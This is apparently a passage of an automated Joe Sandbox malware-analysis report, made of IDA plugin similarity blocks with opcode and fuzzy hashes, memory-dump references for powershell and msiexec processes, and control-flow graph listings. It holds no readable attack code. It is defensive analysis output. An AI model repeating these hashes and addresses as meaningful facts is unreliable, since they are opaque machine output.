                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: e06a4a5f15841d48ea1128938e9cdf649052a1a3afec73cbd079e1dba74393dc
                                                                                                              • Instruction ID: 9792302a9839dcee38dfc7fb9cc0ec1a87893929e2a0027c4c4cafdadcf34544
                                                                                                              • Opcode Fuzzy Hash: e06a4a5f15841d48ea1128938e9cdf649052a1a3afec73cbd079e1dba74393dc
                                                                                                              • Instruction Fuzzy Hash: 31E15DB4A10219DFEB30CB64C954BAAB7B2AF86305F1080D5D50A6F751CB36EE82CF51
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: c0c6021b05eee1a000ca589708b5ea09b6af7b1c29a61f3565a71b0e6e99a98f
                                                                                                              • Instruction ID: 66dd2ada18c7719d5e88cffca322e04bbded9239169dab91a8364349da5d06e8
                                                                                                              • Opcode Fuzzy Hash: c0c6021b05eee1a000ca589708b5ea09b6af7b1c29a61f3565a71b0e6e99a98f
                                                                                                              • Instruction Fuzzy Hash: 30C1C1B0A00245DFEB24CBA4C544BEEBBB2AF89704F14C459E5026F356CB31ED86CB91
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2782184f3e664533c6afc0e897655451d9cc592f1f9d9b27cb6938bbb7ec4576
                                                                                                              • Instruction ID: 83dcb1b58a750b7a3aea9923dd106eeb3d8759d83228d9e3246d30ea7d58ffc0
                                                                                                              • Opcode Fuzzy Hash: 2782184f3e664533c6afc0e897655451d9cc592f1f9d9b27cb6938bbb7ec4576
                                                                                                              • Instruction Fuzzy Hash: 9491A471A0A3D59FC707CB78D89469A7FB1EF46220B1A41D7E480DF2A3C7259C46CBA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b74b8a8a73aec5341b467187bccf27664d2e471aed35c955ab13a138010f4238
                                                                                                              • Instruction ID: 7ffc18e16e1e02c061aec46d27871344539ac39d28b5a87900992121e10898b2
                                                                                                              • Opcode Fuzzy Hash: b74b8a8a73aec5341b467187bccf27664d2e471aed35c955ab13a138010f4238
                                                                                                              • Instruction Fuzzy Hash: 6D5148717043559FDB318B7898107ABBFA2AF87210F0884ABD546DB752D631D881C7B1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 597059da04a7597896382b35a4ec08f60aa02195632315e8d851e64411bc84ed
                                                                                                              • Instruction ID: 4bca951e1ae2b271ca94140584b248db18237917bc5c6d2dd19483650403fd9e
                                                                                                              • Opcode Fuzzy Hash: 597059da04a7597896382b35a4ec08f60aa02195632315e8d851e64411bc84ed
                                                                                                              • Instruction Fuzzy Hash: 90515270A01605DFCB15CF58C894AAEFBB2FF48321F258659D515A7390C731EC92CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0c19fef18b7363d01cb6d756218c8e87296a12d3949c56007c5ee3b7f9ada250
                                                                                                              • Instruction ID: 0bbab3ab3c6555188aea160e9deac4cfdfea3627ac5e4f4087243a3d32200f3a
                                                                                                              • Opcode Fuzzy Hash: 0c19fef18b7363d01cb6d756218c8e87296a12d3949c56007c5ee3b7f9ada250
                                                                                                              • Instruction Fuzzy Hash: 90410BB5B002169FEB349BB998407EBBBE5EF85210B14816AC916E7341DB31DE81C7E1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7593cbef64075b35b465dfee3086df6030d0a091e46b164d0fb24a8beeb3c5fb
                                                                                                              • Instruction ID: 8fe282747cbdda245ee654e803fddc7b80b0fecf007aac2f8048b07385453cc2
                                                                                                              • Opcode Fuzzy Hash: 7593cbef64075b35b465dfee3086df6030d0a091e46b164d0fb24a8beeb3c5fb
                                                                                                              • Instruction Fuzzy Hash: A051FC74A01609DFCB15CF58C494AAEF7B2FF88325F258619E916AB394C731EC92CB50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7ef296193101af6544bacdc534bbf3c0e525a1584ccc5d6e3058e517fd00e86a
                                                                                                              • Instruction ID: 7ef1c8c7bc3d38a84c28942e4c69f7e98bd1c852c6a9ddbf2e304440ebe13738
                                                                                                              • Opcode Fuzzy Hash: 7ef296193101af6544bacdc534bbf3c0e525a1584ccc5d6e3058e517fd00e86a
                                                                                                              • Instruction Fuzzy Hash: 92411B74E012059FDB15CFA8C894AAEB7B1FF48320F258258E955AB3A1C735EC91CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 29841067e18fd9739f97c755b4961dcff658d861e226febf84f4f285cb1af638
                                                                                                              • Instruction ID: 3f8fb7de13c45ca025d43af919bf646e825759656a8dea5500eb33c1b27226f7
                                                                                                              • Opcode Fuzzy Hash: 29841067e18fd9739f97c755b4961dcff658d861e226febf84f4f285cb1af638
                                                                                                              • Instruction Fuzzy Hash: CF412974A00209DFDB05CFA8C884AAEB7B1FF48320F258258E955A73A4C735EC91CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3bd0adfb485cf9c2eaecd617379495611f9a61ea71950bc1eef62a810bf7e56d
                                                                                                              • Instruction ID: 91e5ba546507e167cf56809e796c10e0b21b11f810d625352780b08e9700306d
                                                                                                              • Opcode Fuzzy Hash: 3bd0adfb485cf9c2eaecd617379495611f9a61ea71950bc1eef62a810bf7e56d
                                                                                                              • Instruction Fuzzy Hash: 874119B4A01605DFDB15CF6CD894AADBBB2FF8C321B248668D855A7355C731EC81CB90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b9f8d6ba5ddb0875705661f968c3d0de627cd1998ea92ed8b168f67a394ed05e
                                                                                                              • Instruction ID: 6c9c9461fcf80f7835dbe00685d3a4826bd225ab1a81ac9997ec8f9268bec9d6
                                                                                                              • Opcode Fuzzy Hash: b9f8d6ba5ddb0875705661f968c3d0de627cd1998ea92ed8b168f67a394ed05e
                                                                                                              • Instruction Fuzzy Hash: EE411A74E00509DFCB15CF68D884AAEBBB2FF88324B248268E815A7365C731AC41CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 09518de3c692f6aa5d912dc2f91249df170edb6e41b69561381dfd67629636ca
                                                                                                              • Instruction ID: 99c0b3aa09353e919b67fa2a61713ff80d05f824b15316ab442cb3b9349c314b
                                                                                                              • Opcode Fuzzy Hash: 09518de3c692f6aa5d912dc2f91249df170edb6e41b69561381dfd67629636ca
                                                                                                              • Instruction Fuzzy Hash: DD3192B0B50204ABF714D7A4C854BAE77A3AFC5704F20C468E9027F791CF75AD468BA5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f0fdbdad43d96717111bf14c6e29352da38d54765bfa1f602e97e16f7f1d70ec
                                                                                                              • Instruction ID: 25ba828720eec0dba1fc84d25c72085eb8f478c532e98264b4926344b05a73e9
                                                                                                              • Opcode Fuzzy Hash: f0fdbdad43d96717111bf14c6e29352da38d54765bfa1f602e97e16f7f1d70ec
                                                                                                              • Instruction Fuzzy Hash: E63138F57102128BEB34877454113FAB7928BC7211F04847AC503EB7A2EB35CAA2C7A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 3da5fc007b4fc94fac6f1c46148fa14a11238fad3d9ae409b8834ab7e7f61edc
                                                                                                              • Instruction ID: 7557555722f8df15b64e08059af832f560c3bd9680a2834e9631ec6ad3d61aa3
                                                                                                              • Opcode Fuzzy Hash: 3da5fc007b4fc94fac6f1c46148fa14a11238fad3d9ae409b8834ab7e7f61edc
                                                                                                              • Instruction Fuzzy Hash: 9C2179B12043166BD7304B7588107B77FE6AF87300F648426E942DB3D2DA78E981C761
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 526f1d0351d11703c6b3eaa63c43b94d08707f78c9c2f823e8c8e4708299994f
                                                                                                              • Instruction ID: c36cc941c2ac6902682dbb5ce0ea36980c588bd0a909d9059018acd7911f6f85
                                                                                                              • Opcode Fuzzy Hash: 526f1d0351d11703c6b3eaa63c43b94d08707f78c9c2f823e8c8e4708299994f
                                                                                                              • Instruction Fuzzy Hash: 9501F2F1B442229BF23517B40C11BAE27239BC2625B1104ABC902AF791DA754D43C7FA
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1865578890.0000000008FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08FA0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_8fa0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 34cb75f6553f5efa3fc9597631749b16f751daebb01af72f2f30c34dcc620c45
                                                                                                              • Instruction ID: 00e85490c3ac04c996f82eda7df4c246ef057c7daeaea6c219727f3599bcf01d
                                                                                                              • Opcode Fuzzy Hash: 34cb75f6553f5efa3fc9597631749b16f751daebb01af72f2f30c34dcc620c45
                                                                                                              • Instruction Fuzzy Hash: C901D631A05284FFCF02CBA8D8906ECFF72FF8A220B258186E454AB272C7315C16DB55
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000002.00000002.1862794370.00000000076B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 076B0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_2_2_76b0000_powershell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 51a393dd352554c98aedd2a85e9cad17380ee786106d0f8dd9a0ac89f4ead241
                                                                                                              • Instruction ID: 4d66f8ee394594b21d2f0c92aabefb77ec53a281885f73b1b18e5036e48566df
                                                                                                              • Opcode Fuzzy Hash: 51a393dd352554c98aedd2a85e9cad17380ee786106d0f8dd9a0ac89f4ead241
                                                                                                              • Instruction Fuzzy Hash: 2FA0127420110047C100D600C941804B3519BC2604B16C08855084F281CB23D803C700

                                                                                                              Execution Graph

                                                                                                              Execution Coverage:5.9%
                                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                                              Signature Coverage:0%
                                                                                                              Total number of Nodes:17
                                                                                                              Total number of Limit Nodes:3
                                                                                                              execution_graph 16528 26e62db0 16529 26e630b8 16528->16529 16530 26e62dd8 16528->16530 16531 26e62de1 16530->16531 16534 26e622ac 16530->16534 16533 26e62e04 16535 26e622b7 16534->16535 16536 26e630fb 16535->16536 16538 26e622c8 16535->16538 16536->16533 16539 26e63130 OleInitialize 16538->16539 16540 26e63194 16539->16540 16540->16536 16541 26e63348 16542 26e633ad 16541->16542 16544 26e633fa 16542->16544 16545 26e62374 16542->16545 16546 26e64408 DispatchMessageW 16545->16546 16547 26e64474 16546->16547 16547->16542

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 0 26e644c8-26e644f3 1 26e644f5 0->1 2 26e644fa-26e6455a 0->2 1->2 4 26e64560-26e64671 2->4 5 26e6488f-26e648b7 2->5 47 26e64673-26e6467f 4->47 48 26e6469b 4->48 8 26e65046-26e6506e 5->8 9 26e648bd-26e648ea 5->9 13 26e65074-26e6524b 8->13 14 26e65309 8->14 16 26e648f0-26e64af4 9->16 17 26e64bea-26e64f55 9->17 174 26e65251 call 29f3168 13->174 175 26e65251 call 29f2dd1 13->175 18 26e6530a-26e65311 14->18 116 26e64af6-26e64b0b 16->116 117 26e64b0d-26e64b1e 16->117 160 26e64f57-26e64f6c 17->160 161 26e64f6e-26e64f7f 17->161 51 26e64681-26e64687 47->51 52 26e64689-26e6468f 47->52 54 26e646a1-26e64843 48->54 55 26e64699 51->55 52->55 128 26e64845-26e64851 54->128 129 26e64852 54->129 55->54 123 26e64b1f-26e64be5 116->123 117->123 118 26e65256-26e652cf 141 26e652da-26e652dc 118->141 152 26e65045 123->152 128->129 129->5 141->18 152->8 164 26e64f80-26e65044 160->164 161->164 164->152 174->118 175->118
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2585454050.0000000026E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 26E60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_26e60000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: p4q
                                                                                                              • API String ID: 0-81493438
                                                                                                              • Opcode ID: b004e27c08cc2e0cf5746cda4920aa55d93fedebf3d5c0def6f50fdd47dbd004
                                                                                                              • Instruction ID: 1adede7e9bf761976cac039a7d9caf34164d3fb0a2a53b6db2d708df6d785816
                                                                                                              • Opcode Fuzzy Hash: b004e27c08cc2e0cf5746cda4920aa55d93fedebf3d5c0def6f50fdd47dbd004
                                                                                                              • Instruction Fuzzy Hash: 9B82B274A10228CFEB65DF64C894BD9B7B2BF89301F1085E9D909A7360DB359E82CF54

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 309 29f2dd1-29f2ded 310 29f2def-29f2df1 309->310 311 29f2df6-29f2e06 309->311 312 29f3094-29f309b 310->312 313 29f2e0d-29f2e1d 311->313 314 29f2e08 311->314 316 29f307b-29f3089 313->316 317 29f2e23-29f2e31 313->317 314->312 320 29f309c-29f3182 316->320 322 29f308b-29f308f call 29f02a8 316->322 317->320 321 29f2e37 317->321 391 29f3189-29f323c call 29f16c8 call 29f16d8 call 29f16e8 call 29f16f8 320->391 392 29f3184 320->392 321->320 323 29f2e3e-29f2e50 321->323 324 29f2e7b-29f2e9d 321->324 325 29f2f3a-29f2f62 321->325 326 29f2fd6-29f2ffc 321->326 327 29f2e55-29f2e76 321->327 328 29f2f14-29f2f35 321->328 329 29f2f94-29f2fd1 321->329 330 29f302f-29f304a call 29f02b8 321->330 331 29f306f-29f3079 321->331 332 29f2eee-29f2f0f 321->332 333 29f304c-29f306d call 29f18c8 321->333 334 29f2ec8-29f2ee9 321->334 335 29f2f67-29f2f8f 321->335 336 29f2ea2-29f2ec3 321->336 337 29f3001-29f302d 321->337 322->312 323->312 324->312 325->312 326->312 327->312 328->312 329->312 330->312 331->312 332->312 333->312 334->312 335->312 336->312 337->312 405 29f3241-29f3327 call 29f02c4 391->405 392->391
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fcb97a19ade457d38a79c58bb3a65fd713bd67d7463d44735c18aba53eecb836
                                                                                                              • Instruction ID: 22f6f8e00e46ac6343e1456e77f74dca7da0d950c10119ef159e56a9aaa78ccc
                                                                                                              • Opcode Fuzzy Hash: fcb97a19ade457d38a79c58bb3a65fd713bd67d7463d44735c18aba53eecb836
                                                                                                              • Instruction Fuzzy Hash: 62F17C34E05348DFDB88DFB9D8546AEBBB6BF88300B14896AD506EB354DF359842CB50

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 993 29f4328-29f4368 995 29f436f-29f444c call 29f3168 call 29f2c88 993->995 996 29f436a 993->996 1006 29f444e 995->1006 1007 29f4453-29f4471 995->1007 996->995 1006->1007 1037 29f4474 call 29f4612 1007->1037 1038 29f4474 call 29f4620 1007->1038 1008 29f447a-29f4485 1009 29f448c-29f4490 1008->1009 1010 29f4487 1008->1010 1011 29f4495-29f449c 1009->1011 1012 29f4492-29f4493 1009->1012 1010->1009 1014 29f449e 1011->1014 1015 29f44a3-29f44b1 1011->1015 1013 29f44b4-29f44f8 1012->1013 1019 29f455e-29f4575 1013->1019 1014->1015 1015->1013 1021 29f44fa-29f4510 1019->1021 1022 29f4577-29f459c 1019->1022 1026 29f453a 1021->1026 1027 29f4512-29f451e 1021->1027 1028 29f459e-29f45b3 1022->1028 1029 29f45b4 1022->1029 1032 29f4540-29f455d 1026->1032 1030 29f4528-29f452e 1027->1030 1031 29f4520-29f4526 1027->1031 1028->1029 1033 29f4538 1030->1033 1031->1033 1032->1019 1033->1032 1037->1008 1038->1008
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_29f0000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 6e6cef454a113afffe6ad7cb6c7d51713531e5756812f67d5aaf44a10a6b9f62
                                                                                                              • Instruction ID: d5f16a222cd74baf45745e5838bda35c10da75d4c9b2fcb4b19a09533eff2ec7
                                                                                                              • Opcode Fuzzy Hash: 6e6cef454a113afffe6ad7cb6c7d51713531e5756812f67d5aaf44a10a6b9f62
                                                                                                              • Instruction Fuzzy Hash: 9491E374E00218CFEB54DFA9D984A9EBBF2BF89300F14D069D919AB365DB349942CF10

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 289 26e622c8-26e63192 OleInitialize 291 26e63194-26e6319a 289->291 292 26e6319b-26e631b8 289->292 291->292
                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 26E63185
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2585454050.0000000026E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 26E60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_26e60000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2538663250-0
                                                                                                              • Opcode ID: aa242598019e3ea14b2720c5cf849d17c63617642f10515f2cdcc85631de854d
                                                                                                              • Instruction ID: d004c05796bfdacaa743b288431804c6e7d1d117f95c6a4842cd2cda070fc2e5
                                                                                                              • Opcode Fuzzy Hash: aa242598019e3ea14b2720c5cf849d17c63617642f10515f2cdcc85631de854d
                                                                                                              • Instruction Fuzzy Hash: 861115B5900388CFDB10CF9AD844BDEFBF4EB48224F20845AE529A7700D374A944CFA9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 295 26e62374-26e64472 DispatchMessageW 297 26e64474-26e6447a 295->297 298 26e6447b-26e6448f 295->298 297->298
                                                                                                              APIs
                                                                                                              • DispatchMessageW.USER32(?), ref: 26E64465
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2585454050.0000000026E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 26E60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_26e60000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 2061451462-0
                                                                                                              • Opcode ID: 1e3c3d12fb6e07a38478e99fb5c22741a8b940440c5ad034774b7a1f0fa1708e
                                                                                                              • Instruction ID: 9f163761e19bb7096236b8872c4366207805fd38c9e82fd73a2be5cc3d56e30e
                                                                                                              • Opcode Fuzzy Hash: 1e3c3d12fb6e07a38478e99fb5c22741a8b940440c5ad034774b7a1f0fa1708e
                                                                                                              • Instruction Fuzzy Hash: AF11E0B1D04688CFDB10CFAAD844BDEBBF4AF48314F10852AE559A7210D378A545CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 300 26e63128-26e63192 OleInitialize 301 26e63194-26e6319a 300->301 302 26e6319b-26e631b8 300->302 301->302
                                                                                                              APIs
                                                                                                              • OleInitialize.OLE32(00000000), ref: 26E63185
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2585454050.0000000026E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 26E60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_26e60000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Initialize
                                                                                                              • String ID:
                                                                                                              • API String ID: 2538663250-0
                                                                                                              • Opcode ID: 7acace06bfb12a4d4d5cf8bc66d4d93956ae64a3dd1ba2cfa4990ac24bd5e66c
                                                                                                              • Instruction ID: bf613281f19fd6c449a75c51c45b079494481f2ac9b4c85c7da7e8d8fec603b3
                                                                                                              • Opcode Fuzzy Hash: 7acace06bfb12a4d4d5cf8bc66d4d93956ae64a3dd1ba2cfa4990ac24bd5e66c
                                                                                                              • Instruction Fuzzy Hash: 581103B59003889FDB10CF9AD445BDEBBF4EB48224F20845AE558A7700C374A944CBA9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 305 26e64401-26e64472 DispatchMessageW 306 26e64474-26e6447a 305->306 307 26e6447b-26e6448f 305->307 306->307
                                                                                                              APIs
                                                                                                              • DispatchMessageW.USER32(?), ref: 26E64465
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2585454050.0000000026E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 26E60000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_26e60000_msiexec.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 2061451462-0
                                                                                                              • Opcode ID: 43bac57deaa9e3f89d869ca9847cb19ef9edcb629792704727bb04bc2a12c941
                                                                                                              • Instruction ID: c8056a030d72319ccd24f60acd62a4aa0c2c41ea57538d36d20aea8907c21f60
                                                                                                              • Opcode Fuzzy Hash: 43bac57deaa9e3f89d869ca9847cb19ef9edcb629792704727bb04bc2a12c941
                                                                                                              • Instruction Fuzzy Hash: ED11E0B1C04688CFCB10CFAAD444BDEBBF4EF48314F10852AE569A7240D374A545CFA5

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 692 29f4f00-29f4f22 693 29f4f38-29f4f43 692->693 694 29f4f24-29f4f28 692->694 697 29f4feb-29f5017 693->697 698 29f4f49-29f4f4b 693->698 695 29f4f2a-29f4f36 694->695 696 29f4f50-29f4f57 694->696 695->693 695->696 700 29f4f59-29f4f60 696->700 701 29f4f77-29f4f80 696->701 704 29f501e-29f5076 697->704 699 29f4fe3-29f4fe8 698->699 700->701 703 29f4f62-29f4f6d 700->703 773 29f4f82 call 29f4ef0 701->773 774 29f4f82 call 29f4f00 701->774 703->704 705 29f4f73-29f4f75 703->705 724 29f5078-29f507e 704->724 725 29f5085-29f5097 704->725 705->699 706 29f4f88-29f4f8a 707 29f4f8c-29f4f90 706->707 708 29f4f92-29f4f9a 706->708 707->708 710 29f4fad-29f4fcc 707->710 711 29f4f9c-29f4fa1 708->711 712 29f4fa9-29f4fab 708->712 718 29f4fce-29f4fd7 710->718 719 29f4fe1 710->719 711->712 712->699 771 29f4fd9 call 29f9f6d 718->771 772 29f4fd9 call 29f9eb0 718->772 719->699 721 29f4fdf 721->699 724->725 727 29f509d-29f50a1 725->727 728 29f512b-29f512d 725->728 729 29f50a3-29f50af 727->729 730 29f50b1-29f50be 727->730 775 29f512f call 29f52ba 728->775 776 29f512f call 29f52c8 728->776 736 29f50c0-29f50ca 729->736 730->736 731 29f5135-29f513b 733 29f513d-29f5143 731->733 734 29f5147-29f514e 731->734 737 29f51a9-29f5208 733->737 738 29f5145 733->738 741 29f50cc-29f50db 736->741 742 29f50f7-29f50fb 736->742 750 29f520f-29f5226 737->750 738->734 753 29f50dd-29f50e4 741->753 754 29f50eb-29f50f5 741->754 744 29f50fd-29f5103 742->744 745 29f5107-29f510b 742->745 748 29f5105 744->748 749 29f5151-29f51a2 744->749 745->734 746 29f510d-29f5111 745->746 746->750 751 29f5117-29f5129 746->751 748->734 749->737 751->734 753->754 754->742 771->721 772->721 773->706 774->706 775->731 776->731
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2561372577.00000000029F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029F0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
